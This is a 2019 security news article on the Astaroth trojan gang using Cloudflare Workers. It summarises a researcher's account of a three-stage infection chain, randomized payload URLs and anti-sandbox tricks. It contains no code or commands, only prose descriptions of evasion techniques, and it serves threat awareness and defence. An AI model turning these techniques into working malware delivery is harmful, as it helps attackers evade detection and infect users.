4 September 2019

The gang behind Astaroth trojan uses Cloudflare Workers to circumvent security solutions

The gang behind Astaroth trojan uses Cloudflare Workers to circumvent security solutions

The hacker group behind Astaroth trojan has changed its tactics and now is distributing a new variant of the malware using Cloudflare Workers serverless computing platform to avoid detection by security solutions.

Cloudflare Workers provides a lightweight JavaScript execution environment that allows developers to augment existing applications or create entirely new ones without configuring or maintaining infrastructure. “Workers has a free plan which anyone or anything can sign up and get 100,000 total requests per day. You can create unlimited number of workers per account,” explained Check Point malware researcher Marcel Afrahim who discovered the new campaign.

The Astaroth’s operators leverage Cloudflare Workers as part of three-stage infection process, which starts with a fishing email with HTML attachment containing obfuscated Javascript code and linking to a domain that sits behind Cloudflare’s web infrastructure. The domain serves for delivering several types of payloads in JSON format depending on the target's location allowing the threat actors quickly change the malicious files for various targets and to avoid getting blocked based on file object types sent to their potential victims' computers.

“To generate the second stage of the attack, the JSON from the URL is parsed, converted from Base64 to Array buffer, written to browser’s blob storage, renamed to match to the name of the HTML file, a link is created and auto clicked to download it to user’s browser,” Afrahim discovered.

The second stage of infection involves a zip file which is created based on the data from the URL. That zipped file is used to redirect to URL pointing at the contents of a script created with the help of the Cloudflare Workers dashboard script editor. The most interesting part here is that the URL used to download the script can be changed with random values, providing “a large or unlimited number of the hostname that can execute particular code which traditional anti-bot or blocking tools will fail to catch.”

While Cloudflare Workers do not have the capability to host file, it can redirect traffic from its Workers to a static file hosting server without revealing its identity, pointed out the researcher.

The script file is saved into 'temp\ Lqncxmm:vbvvjjh.js' and executed with Windows Script Host (Wscript) process. Using a simple random number generator, the Astaroth’s operators randomize the URL that will download third stage payload. The payload will be downloaded using ten randomized and unique Cloudflare Worker node links, each of them "would have 900 million variations". On systems running a 32-bit version of Windows the attackers are using a private Google Storage repository with a static link instead of Cloudflare links.

“The most likely explanation for this is that they wanted to fool the Sandboxes and automated analysis tools. Most of the automated sandboxes still rely on 32-bit system mainly because it has better anti-sandbox detection techniques. Using this method, the threat actors give away a static IOC to the analyst to keep operation intact in real-world and the users that are being infected,” said the researcher.

Based on his findings Afrahim concluded that bad actors behind this campaign use Cloudflare Workers and network to:

1. Have a resilient, efficient and secure network to spread payloads.

2. Rely on trusted domain names and services to expand coverage.

3. Hide from sandboxes and interrupt automated analysis tools.

4. An innovative way to generate random payload URLs for each run.

5. Rebuild the operation with ease in case of compromise.

 

Back to the list

Latest Posts

New TortoiseShell group hits 11 IT providers in Saudi Arabia to compromise their customers

New TortoiseShell group hits 11 IT providers in Saudi Arabia to compromise their customers

To compromise their targets the group used a unique malware called Backdoor.Syskit.
19 September 2019
“Unsophisticated” Panda threat group makes thousands of dollars using RATs and cryptominers

“Unsophisticated” Panda threat group makes thousands of dollars using RATs and cryptominers

While not highly sophisticated, the Panda group is considered one of the most active attackers on today’s cybercriminal scene.
18 September 2019
Emotet botnet returns to action, resumes malspam operations

Emotet botnet returns to action, resumes malspam operations

The new Emotet campaign targeеы Germany, the United Kingdom, Poland, Italy, and the USA.
17 September 2019